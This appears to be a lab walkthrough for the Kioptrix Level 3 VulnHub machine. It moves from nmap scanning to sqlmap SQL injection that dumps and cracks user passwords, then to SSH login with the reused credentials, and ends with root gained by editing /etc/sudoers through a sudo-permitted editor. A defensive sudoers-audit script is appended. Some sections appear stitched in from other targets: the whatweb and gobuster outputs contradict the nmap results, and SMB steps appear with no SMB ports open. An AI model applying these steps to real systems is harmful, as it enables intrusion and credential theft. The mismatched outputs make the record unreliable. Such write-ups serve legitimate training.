
Escape

Overview

Name: Template
Release Date: 2024-02-28
Write-up Author: kill3r
Machine Author: kill3r
Difficulty: Medium
User Flag:
Root Flag:
Link: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Related skills

  1. File Upload
  2. Local File Include
  3. vim to shell

Weak points

  1. Weak wordlist-building and information-gathering skills

Nmap scan

```bash
ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.129 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.150.129 -oN nmap.txt
# Line 1 scans every port (1-65535) on the target with nmap; --min-rate=1000 sends at least 1000 packets per second and -T4 selects the fast (aggressive) timing template.
# grep -oE '(^[0-9][^/tcp]*)' pulls the port numbers out of the output, and tr '\n' ',' joins them into a single comma-separated string.
# Line 2 rescans only those ports: -p$ports uses the extracted list, -sV does service/version detection, -sC runs the default NSE scripts to probe for common issues, -O does OS detection, and -oN nmap.txt saves the results to nmap.txt.
```
```
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.129 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.150.129 -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 10:11 CST
Nmap scan report for kioptrix3.com (192.168.150.129)
Host is up (0.00044s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
MAC Address: 00:0C:29:9F:D9:FA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds
```

Enumeration

SMB enumeration

Port: 139 389 445 636

  • enum4linux -a/-A 127.0.0.1

```bash
$ enum4linux -A <ip>
```

  • MSF-SMB

```bash
# Fingerprint the SMB version
msf6 > use auxiliary/scanner/smb/smb_version
# Enumerate shares
msf6 > use auxiliary/scanner/smb/smb_enumshares
# Enumerate user information over SMB (SID lookup)
msf6 > use auxiliary/scanner/smb/smb_lookupsid
```

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

  • Finger: retrieves information about a specific user, or the list of users and their configuration on the system

whatweb

```
# Identifies the target site's technology stack, CMS, plugins, frameworks and related details by analyzing its responses and page content.
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.150.129
http://192.168.150.129 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.150.129], Script[text/javascript]
```
  • Directory enumeration

```bash
dirb http://192.168.150.129

dirsearch -u http://192.168.150.129 -r

gobuster dir -w ... -u http://192.168.150.129 -x html,php,js,bak
```

```
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.150.129 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.150.129
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/03 22:01:51 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 1620]
/profile.php (Status: 200) [Size: 1473]
/javascript.js (Status: 200) [Size: 0]
/javascript (Status: 301) [Size: 321] [--> http://192.168.150.129/javascript/]
/exploit.html (Status: 200) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099312 / 1102805 (99.68%)===============================================================
2023/08/03 22:03:22 Finished
===============================================================
```
  • Vulnerability scanning

```bash
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/
```

wordlist

  • cewl.list: cewl http://192.168.150.129/ -w cewl.txt

```
now
Post
comment
Name
Website
Remember
Administration
Username
Password
Proudly
Powered
Adminstration
```

  • pass.list

```
n0t7t1k4
Mast3r
starwars
```

  • user.list

```
admin
dreg
loneferret
```

  • hash.list

  • information.list

Walkthrough

Visit the target and look for functionality

Once inside the blog, every image is broken. Opening the developer tools (F12) and checking the Network tab shows that the images are requested from a domain name, so we edit the hosts file and map that domain to the target IP.

The page now renders correctly. A check for well-known CMSes finds nothing, so we look for SQL injection points: one sort feature allows ordering by ID, and we test whether that parameter is injectable.

Information analysis

SQL injection

A SQL error comes back, so we hand it to SQLMap (it could be injected by hand as well).

```
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id --dbs

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id -D gallery --tables

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id -D gallery --dump

Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password | username |
+----+---------------------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+


Database: gallery
Table: gallarific_users
[1 entry]
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| userid | email | photo | website | joincode | lastname | password | username | usertype | firstname | datejoined | issuperuser |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| 1 | <blank> | <blank> | <blank> | <blank> | User | n0t7t1k4 | admin | superuser | Super | 1302628616 | 1 |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
```

Credential reuse

Use the recovered usernames and passwords to try logging in to the CMS admin panel or the SSH service.

```
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh dreg@192.168.150.129
Unable to negotiate with 192.168.150.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
# This error is a host key type mismatch between the SSH client and the server. As the message says, the server offers ssh-rsa and ssh-dss, but the client accepts neither; OpenSSH 7.0 removed ssh-dss and it is no longer supported by default.

# Use ssh's -o option to specify which host key algorithm to accept
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh -o HostKeyAlgorithms=ssh-rsa dreg@192.168.150.129

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh -o HostKeyAlgorithms=ssh-rsa loneferret@192.168.150.129
```

System information gathering

Shell as dreg

```
1. history
2. dreg@Kioptrix3:~$ ll -a
-rbash: /usr/bin/python: restricted: cannot specify `/' in command names
# something is off with bash: this is rbash, a restricted shell
```

Shell as loneferret

```
1. history
2. loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README

3. loneferret@Kioptrix3:~$ ./checksec.sh --help
Usage: checksec [OPTION]

Options:

--file <executable-file>
--dir <directory> [-v]
--proc <process name>
--proc-all
--proc-libs <process ID>
--kernel
--fortify-file <executable-file>
--fortify-proc <process ID>
--version
--help

For more information, see:
http://www.trapkit.de/tools/checksec.html
# doesn't seem useful

4. loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
# sudo -l shows the ht editor can run as root, which looks like a privilege-escalation path
```

```
loneferret@Kioptrix3:~$ export TERM=xterm

loneferret@Kioptrix3:~$ sudo ht
# open /etc/sudoers
# the key bindings are listed at the bottom: F3 open, F2 save
# User privilege specification
│root ALL=(ALL) ALL
│loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht,/bin/bash
# F10 to save and exit
```

```
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
(root) NOPASSWD: /bin/bash

loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# whoami
root
```
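The root step on this box comes down to two sudoers mistakes: a NOPASSWD editor running as root (which can rewrite /etc/sudoers itself) and a `!/usr/bin/su` negation that restricts nothing. As an added example that is not part of the write-up, the Python audit below parses sudoers user specifications and flags exactly those patterns, tracking NOPASSWD/PASSWD tags as they carry across a command list and the optional (runas) field. SAMPLE_SUDOERS is a constructed copy of the lines shown in ht plus a typical Defaults line; the SHELLS and EDITORS sets are my assumption of which binaries deserve a flag.

```python
import re

# Assumption: binaries that hand the run-as user a shell, or let it rewrite any file.
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh"}
EDITORS = {"/usr/local/bin/ht", "/usr/bin/vim", "/usr/bin/vi", "/usr/bin/nano"}
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV", "LOG_INPUT", "LOG_OUTPUT"}
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
# user  host = (runas) cmnd, cmnd ...   the "(runas)" part is optional
SPEC_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")

# Constructed input: the user specification seen in ht above, plus a typical Defaults line.
SAMPLE_SUDOERS = """\
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# User privilege specification
root ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht,/bin/bash
"""

def audit_sudoers(text):
    """Return (user, command, finding) tuples for risky user specifications."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith(SKIP):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        user, _host, runas, cmnd_list = m.groups()
        runas = runas or "root"
        nopasswd = False
        for item in cmnd_list.split(","):
            words = item.split()
            # A tag applies to every later command in the list until the opposite tag appears
            while words and words[0].rstrip(":").upper() in TAGS:
                tag = words.pop(0).rstrip(":").upper()
                if tag in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag == "NOPASSWD"
            if not words:
                continue
            cmnd, how = words[0], f"{'NOPASSWD ' if nopasswd else ''}as {runas}"
            if cmnd.startswith("!"):
                findings.append((user, cmnd, "negated command: '!' excludes one path only and is not a restriction"))
            elif cmnd in SHELLS:
                findings.append((user, cmnd, f"shell {how}"))
            elif cmnd in EDITORS:
                findings.append((user, cmnd, f"editor {how}: can rewrite /etc/sudoers or any file"))
    return findings

print(*audit_sudoers(SAMPLE_SUDOERS), sep="\n")
```

Run it against `sudo -l`-style exports or the real file (read with `visudo -c` semantics in mind: aliases and `#include` lines are skipped, not expanded), and treat any NOPASSWD editor or shell as root-equivalent access.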

Shell as user1

Shell as user2

Shell as root

Save a screenshot as the flag or proof